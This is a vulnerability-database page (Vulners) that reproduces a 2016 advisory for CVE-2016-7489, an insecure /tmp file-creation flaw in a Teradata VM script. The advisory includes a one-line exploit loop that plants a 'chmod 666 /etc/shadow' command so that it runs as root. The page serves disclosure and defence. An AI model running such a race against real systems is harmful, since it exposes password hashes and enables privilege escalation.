Vulners
Lucene search
Teradata Virtual Machine Community Edition 15.0 Insecure File Creation
🗓️ 18 Nov 2016 00:00:00Reported by Larry W. CashdollarType 
packetstorm🔗 packetstormsecurity.com👁 49 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Teradata Virtual Machine Community Edition 15.0 Insecure File Creation Vulnerability | 19 Nov 201600:00 | – | zdt |
 | CVE-2016-7489 | 10 Nov 201616:59 | – | attackerkb |
 | Teradata Virtual Machine Community Edition Code Execution Vulnerability | 14 Nov 201600:00 | – | cnvd |
 | CVE-2016-7489 | 10 Nov 201616:00 | – | cve |
 | CVE-2016-7489 | 10 Nov 201616:00 | – | cvelist |
 | EUVD-2016-8342 | 7 Oct 202500:30 | – | euvd |
 | CVE-2016-7489 | 10 Nov 201616:59 | – | nvd |
 | Code injection | 10 Nov 201616:59 | – | prion |
`Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact
Description: Teradata is a relational database, they provide a Virtual Machine image for developers and community use.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution.
In /opt/teradata/gsctools/bin/t2a.pl
320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ;
If a regular user controls /tmp/t2a.pl.get_profile.scr before the person executing this script creates it they can inject
commands to be executed as that user.
for example:
$ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done
If root or any other account runs that .pl script I see these files being created in /tmp
[C] -rw-r----- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
[U] -rw-r----- 1 root root 14 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
[C] -rw-r----- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager
[C] -rw-r----- 1 root root 0 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[U] -rw-r----- 1 root root 44 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[U] -rw-r----- 1 root root 152 Mon Oct 3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[C] -rw-r----- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr
[U] -rw-r----- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr
[M] -rwxr-x--- 1 root root 5 Mon Oct 3 13:03:59 2016 /tmp/t2a.get_profile.scr
CVE-ID: CVE-2016-7489
Exploit Code:
aC/ $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done
Advisory: www.vapidlabs.com/advisory.php?v=173
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Nov 2016 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00886